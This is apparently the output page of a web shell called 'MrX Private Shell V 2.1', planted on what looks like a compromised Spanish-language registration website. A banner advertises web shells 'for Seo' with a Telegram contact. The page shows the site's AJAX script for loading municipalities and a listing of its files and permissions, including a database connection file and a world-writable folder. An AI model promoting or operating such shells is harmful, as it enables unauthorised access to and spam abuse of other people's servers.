__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
function getXMLHTTPRequest() {
var req = false;
try {
req = new XMLHttpRequest();
} catch (err1) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch (err2) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch (err3) {
req = false;
}
}
}
return req;
}
/* ==============================
MUNICIPIO NACIMIENTO
============================== */
function cargamunicipio(departamento) {
if (!departamento) {
document.getElementById("municipio_nacimiento").innerHTML =
"<option value=''>Seleccione un municipio</option>";
return;
}
var http = getXMLHTTPRequest();
var url = "carga_municipios.php?ele=" + encodeURIComponent(departamento);
http.onreadystatechange = function () {
if (http.readyState === 4) {
if (http.status === 200) {
document.getElementById("municipio_nacimiento").innerHTML =
http.responseText;
} else {
console.log("Error AJAX:", http.status);
}
}
};
http.open("GET", url, true);
http.send(null);
}
/* ==============================
MUNICIPIO RESIDENCIA
============================== */
function cargamunicipio2(departamento) {
if (!departamento) {
document.getElementById("municipio_residencia").innerHTML =
"<option value=''>Seleccione un municipio</option>";
return;
}
var http = getXMLHTTPRequest();
var url = "carga_municipios.php?ele=" + encodeURIComponent(departamento);
http.onreadystatechange = function () {
if (http.readyState === 4) {
if (http.status === 200) {
document.getElementById("municipio_residencia").innerHTML =
http.responseText;
} else {
console.log("Error AJAX:", http.status);
}
}
};
http.open("GET", url, true);
http.send(null);
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| fonts | Folder | 0775 |
|
|
| inscritos | Folder | 0775 |
|
|
| inscritosauxiliar | Folder | 0777 |
|
|
| acta.php | File | 5.07 KB | 0664 |
|
| ajax.js | File | 1.8 KB | 0664 |
|
| auxiliares.php | File | 11.58 KB | 0664 |
|
| auxiliaresguardar.php | File | 11.17 KB | 0664 |
|
| carga_municipios.php | File | 701 B | 0664 |
|
| class.ezpdf.php | File | 53.66 KB | 0664 |
|
| class.pdf.php | File | 97.95 KB | 0664 |
|
| conectarbdsql.php | File | 380 B | 0664 |
|
| cronogramaexamen.png | File | 42.13 KB | 0664 |
|
| encaauxiliar.png | File | 78.18 KB | 0664 |
|
| encamonitor.png | File | 27.36 KB | 0664 |
|
| encamonitor2.png | File | 74.51 KB | 0664 |
|
| encuesta.php | File | 20.08 KB | 0664 |
|
| generarreporte.php | File | 5.04 KB | 0664 |
|
| index.html | File | 9 B | 0664 |
|
| index.php | File | 0 B | 0664 |
|
| jquery-2.1.1.min.js | File | 82.27 KB | 0664 |
|
| jquery-ui-1.7.2.custom.css | File | 25.51 KB | 0664 |
|
| logo.png | File | 11.55 KB | 0664 |
|
| monitores.php | File | 13.86 KB | 0664 |
|
| monitoresguardar.php | File | 13.38 KB | 0664 |
|
| reporte.php | File | 2.35 KB | 0664 |
|
| styles.css | File | 3.74 KB | 0664 |
|